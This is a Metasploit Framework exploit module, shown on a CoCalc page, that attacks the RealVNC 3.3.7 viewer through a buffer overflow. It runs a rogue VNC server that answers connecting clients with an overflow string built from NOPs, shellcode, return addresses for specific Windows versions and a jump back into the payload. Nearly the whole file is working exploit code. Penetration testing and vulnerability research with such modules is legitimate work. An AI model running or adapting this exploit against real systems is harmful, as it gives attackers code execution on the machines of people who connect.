CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/vnc/realvnc_client.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'RealVNC 3.3.7 Client Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).

16
      },

17
      'Author'         => 'MC',

18
      'License'        => MSF_LICENSE,

19
      'References'     =>

20
        [

21
          [ 'CVE', '2001-0167' ],

22
          [ 'OSVDB', '6281' ],

23
          [ 'BID', '2305' ],

24
        ],

25
      'DefaultOptions' =>

26
        {

27
          'EXITFUNC' => 'thread',

28
        },

29
      'Payload'        =>

30
        {

31
          'Space'    => 500,

32
          'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",

33
          'MaxNops'  => 0,

34
          'StackAdjustment' => -3500,

35
        },

36
      'Platform'       => 'win',

37
      'Targets'        =>

38
        [

39
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],

40
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],

41
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],

42
        ],

43
      'Privileged'     => false,

44
      'DisclosureDate' => '2001-01-29',

45
      'DefaultTarget'  => 0))

46


47
    register_options(

48
      [

49
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])

50
      ])

51
  end

52


53
  def on_client_connect(client)

54


55
    rfb = "RFB 003.003\n"

56


57
    client.put(rfb)

58
  end

59


60
  def on_client_data(client)

61
    return if ((p = regenerate_payload(client)) == nil)

62


63
    filler = make_nops(993 - payload.encoded.length)

64


65
    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded

66
    sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')

67
    sploit << rand_text_english(200)

68


69
    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")

70
    client.put(sploit)

71


72
    handler

73
    service.close_client(client)

74
  end

75
end

76


77